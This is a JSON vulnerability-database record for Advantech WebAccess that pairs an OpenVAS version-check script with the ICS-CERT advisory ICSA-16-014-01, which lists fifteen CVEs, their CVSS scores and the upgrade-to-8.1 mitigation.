"openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_advantech_webaccess_mult_vuln.nasl 12313 2018-11-12 08:53:51Z asteins $\n#\n# Advantech WebAccess Multiple Vulnerabilities Jan16\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:advantech:advantech_webaccess\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807033\");\n script_version(\"2019-04-06T12:52:40+0000\");\n script_cve_id(\"CVE-2015-3948\", \"CVE-2015-3943\", \"CVE-2015-3946\", \"CVE-2015-3947\",\n \"CVE-2015-6467\", \"CVE-2016-0851\", \"CVE-2016-0852\", \"CVE-2016-0853\",\n \"CVE-2016-0854\", \"CVE-2016-0855\", \"CVE-2016-0856\", \"CVE-2016-0857\",\n \"CVE-2016-0858\", \"CVE-2016-0859\", \"CVE-2016-0860\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-04-06 12:52:40 +0000 (Sat, 06 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-01-22 10:47:51 +0530 (Fri, 22 Jan 2016)\");\n script_name(\"Advantech WebAccess Multiple Vulnerabilities Jan16\");\n\n script_tag(name:\"summary\", value:\"This host is running Advantech WebAccess\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - The web server does not filter user input correctly.\n\n - Email project accounts are stored in clear text.\n\n - The web server accepts commands via specific scripts that imitate trusted\n accounts.\n\n - The Web server settings, accounts, and projects may be modified through\n scripted commands.\n\n - WebAccess can be made to run remote code through the use of a browser\n plug-in.\n\n - The software reads or writes to a buffer using an index or pointer that\n references a memory location after the end of the buffer.\n\n - Normal and remote users have access to files and folders that only\n administrators should be allowed to access.\n\n - Unrestricted file upload vulnerability.\n\n - Insufficient sanitization of filenames containing directory traversal\n sequences.\n\n - Multiple stack-based buffer overflows.\n\n - Multiple heap-based buffer overflows.\n\n - Integer overflow in the Kernel service.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n remote attacker to upload, create, or delete arbitrary files on the target\n system, deny access to valid users and remotely execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Advantech WebAccess versions before 8.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Advantech WebAccess version\n 8.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_advantech_webaccess_consolidation.nasl\");\n script_mandatory_keys(\"advantech/webaccess/detected\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port ) )\n exit( 0 );\n\npath = infos[\"location\"];\nvers = infos[\"version\"];\n\nif( version_is_less( version: vers, test_version: \"8.1\" ) ) {\n report = report_fixed_ver( installed_version: vers, fixed_version: \"8.1\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2019-07-19T15:42:23", "bulletinFamily": "info", "description": "## OVERVIEW\n\nIlya Karpov of Positive Technologies, Ivan Sanchez, Andrea Micalizzi, Ariele Caltabiano, Fritz Sands, Steven Seeley, and an anonymous researcher have identified multiple vulnerabilities in Advantech WebAccess application. Many of these vulnerabilities were reported through the Zero Day Initiative (ZDI) and iDefense. Advantech has produced a new version to mitigate these vulnerabilities. Ivan Sanchez has tested the new version to validate that it resolves the vulnerabilities which he reported.\n\nThese vulnerabilities could be exploited remotely.\n\n## AFFECTED PRODUCTS\n\nAdvantech reports that the vulnerabilities affect the following versions of WebAccess:\n\n * WebAccess Version 8.0 and prior versions.\n\n## IMPACT\n\nAn attacker who exploits these vulnerabilities may be able to upload, create, or delete arbitrary files on the target system, deny access to valid users, or remotely execute arbitrary code.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of these vulnerabilities based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nAdvantech is based in Taiwan and has distribution offices in 21 countries worldwide.\n\nThe affected product, WebAccess, formerly known as BroadWin WebAccess, is a web-based SCADA and human-machine interface (HMI) product. According to Advantech, WebAccess is deployed across several sectors including Commercial Facilities, Critical Manufacturing, Energy, and Government Facilities. Advantech estimates that these products are used globally.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### ACCESS OF MEMORY LOCATION AFTER END OF BUFFERa\n\nThe software reads or writes to a buffer using an index or pointer that references a memory location after the end of the buffer.\n\nCVE-2016-0851b has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).c\n\n### UNRESTRICTED UPLOAD OF FILE WITH DANGEROUS TYPEd\n\nAn attacker can upload or create arbitrary files on the server without authentication or constraint.\n\nCVE-2016-0854e has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).f\n\n### PATH TRAVERSALg\n\nThe virtual directory created by WebAccess can be browsed anonymously without authentication.\n\nCVE-2016-0855h has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).i\n\n### STACK-BASED BUFFER OVERFLOWj\n\nThere are many instances where the buffer on the stack can be overwritten.\n\nCVE-2016-0856k has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).l\n\n### HEAP-BASED BUFFER OVERFLOWm\n\nThere are many conditions in which more space than what is allocated can be written to the heap.\n\nCVE-2016-0857n has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).o\n\n### RACE CONDITIONp\n\nA specially crafted request can cause a buffer overflow in a shared virtual memory area.\n\nCVE-2016-0858q has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).r\n\n### INTEGER OVERFLOW TO BUFFER OVERFLOWs\n\nAn attacker can send a crafted RPC request to the Kernel service to cause a stack-based buffer overflow.\n\nCVE-2016-0859t has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).u\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERv\n\nAn attacker can send a crafted RPC request to the BwpAlarm subsystem to cause a buffer overflow on global variables.\n\nCVE-2016-0860w has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).x\n\n### IMPROPER ACCESS CONTROLy\n\nNormal and remote users have access to files and folders that only administrators should be allowed to access.\n\nCVE-2016-0852z has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).aa\n\n### IMPROPER INPUT VALIDATIONbb\n\nInput validation vulnerabilities could allow an attacker to gain sensitive information from the target system.\n\nCVE-2016-0853cc has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).dd\n\n### CROSS-SITE SCRIPTINGee\n\nThe web server does not filter user input correctly, allowing a malicious user to initiate a cross-site scripting vulnerability.\n\nCVE-2015-3948ff has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RL:O/RC:R).gg\n\n### SQL INJECTIONhh\n\nWeb server settings, accounts, and projects may be modified through scripted commands.\n\nCVE-2015-3947ii has been assigned to this vulnerability. A CVSS v3 base score of 6.4 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N/E:P/RL:O/RC:R).jj\n\n### CROSS-SITE REQUEST FORGERYkk\n\nThe web server accepts commands via specific scripts that imitate trusted accounts.\n\nCVE-2015-3946ll has been assigned to this vulnerability. A CVSS v3 base score of 5.4 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:P/RL:O/RC:R).mm\n\n### EXTERNAL CONTROL OF FILE NAME OR PATHnn\n\nWebAccess can be made to run remote code through the use of a browser plug-in.\n\nCVE-2015-6467oo has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:P/RL:O/RC:R).pp\n\n### CLEARTEXT STORAGE OF SENSITIVE INFORMATIONqq\n\nEmail project accounts are stored in clear text.\n\nCVE-2015-3943rr has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been assigned; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:R).ss\n\n## VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThese vulnerabilities could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nNo known public exploits specifically target these vulnerabilities.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit these vulnerabilities.\n\n## MITIGATION\n\nAdvantech has released a new version of WebAccess, Version 8.1, to address the reported vulnerabilities. This new version is available on the Advantech website at the following location:\n\n<http://www.advantech.com/industrial-automation/webaccess>\n\nICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet\n * Locate control system networks and remote devices behind firewalls and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page athttp://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-788: Access of Memory Location After End of Buffer, http://cwe.mitre.org/data/definitions/788.html, web site last accessed January 14, 2016.\n * b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0851, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * c. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H, web site last accessed January 14, 2016.\n * d. CWE-434: Unrestricted Upload of File with Dangerous Type, http://cwe.mitre.org/data/definitions/434.html, web site last accessed January 14, 2016.\n * e. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0854, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * f. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, web site last accessed January 14, 2016.\n * g. CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), http://cwe.mitre.org/data/definitions/22.html, web site last accessed January 14, 2016.\n * h. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0855, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * i. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, web site last accessed January 14, 2016.\n * j. CWE-121: Stack-based Buffer Overflow, http://cwe.mitre.org/data/definitions/121.html, web site last accessed January 14, 2016.\n * k. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0856, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * l. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, web site last accessed January 14, 2016.\n * m. CWE-122: Heap-based Buffer Overflow, http://cwe.mitre.org/data/definitions/122.html, web site last accessed January 14, 2016.\n * n. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0857, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * o. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, web site last accessed January 14, 2016.\n * p. CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition'), http://cwe.mitre.org/data/definitions/362.html, web site last accessed January 14, 2016.\n * q. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0858, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * r. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, web site last accessed January 14, 2016.\n * s. CWE-680: Integer Overflow to Buffer Overflow, http://cwe.mitre.org/data/definitions/680.html, web site last accessed January 14, 2016.\n * t. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0859, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * u. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, web site last accessed January 14, 2016.\n * v. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed January 14, 2016.\n * w. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0860, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * x. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N, web site last accessed January 14, 2016.\n * y. CWE-284: Improper Access Control, http://cwe.mitre.org/data/definitions/284.html, web site last accessed January 14, 2016.\n * z. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0852, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * aa. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H , web site last accessed January 14, 2016.\n * bb. CWE-20: Improper Input Validation, http://cwe.mitre.org/data/definitions/20.html, web site last accessed January 14, 2016.\n * cc. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0853, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * dd. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N, web site last accessed January 14, 2016.\n * ee. CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), http://cwe.mitre.org/data/definitions/79.html, web site last accessed January 14, 2016.\n * ff. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3948 , NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * gg. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RL:O/RC:R, web site last accessed January 14, 2016.\n * hh. CWE-89: SQL Injection, http://cwe.mitre.org/data/definitions/89.html, web site last accessed January 14, 2016.\n * ii. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3947, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * jj. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N/E:P/RL:O/RC:R, web site last accessed January 14, 2016.\n * kk. CWE-352: Cross-Site Request Forgery, http://cwe.mitre.org/data/definitions/352.html, web site last accessed January 14, 2016.\n * ll. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3946, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * mm. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:P/RL:O/RC:R, web site last accessed January 14, 2016.\n * nn. CWE-73: External Control of File Name or Path, http://cwe.mitre.org/data/definitions/73.html, web site last accessed January 14, 2016.\n * oo. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6467 , NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * pp. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:P/RL:O/RC:R, web site last accessed January 14, 2016.\n * qq. CWE-312: Cleartext Storage of Sensitive Information, http://cwe.mitre.org/data/definitions/312.html, web site last accessed January 14, 2016.\n * rr. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3943, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * ss. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:R, web site last accessed January 14, 2016.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the NCCIC at: \n \nEmail: [NCCICCUSTOMERSERVICE@hq.dhs.gov](<mailto:NCCICCUSTOMERSERVICE@hq.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: http://ics-cert.us-cert.gov \nor incident reporting: https://ics-cert.us-cert.gov/Report-Incident?\n\nThe NCCIC continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "modified": "2018-08-23T00:00:00", "published": "2016-01-14T00:00:00", "id": "ICSA-16-014-01", "href": "https://www.us-cert.gov//ics/advisories/ICSA-16-014-01", "title": "Advantech WebAccess Vulnerabilities", "type": "ics", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
